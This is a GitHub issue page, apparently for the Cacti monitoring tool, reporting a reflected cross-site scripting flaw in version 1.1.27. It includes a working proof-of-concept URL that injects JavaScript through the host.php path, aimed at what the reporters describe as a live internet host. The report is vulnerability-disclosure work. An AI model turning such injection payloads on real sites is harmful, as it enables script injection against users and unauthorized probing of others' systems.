Skip to content

Reflected XSS in 1.1.27 #1071

Closed
Closed
@cibvetr2

Description

@cibvetr2

We (worlak2 and cibvetr2) found Reflected XSS vuln in last version 1.1.27.(For example we found in Google host with last version of cacti)
PoC
1)http://128.65.97.6/host.php/gahv8'-alert(document.domain)-'w6vt7??host_status=-1&host_template_id=-1&site_id=-1&poller_id=-1&rows=-1&filter=&
default

With regards worlak2 and cibvetr2

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions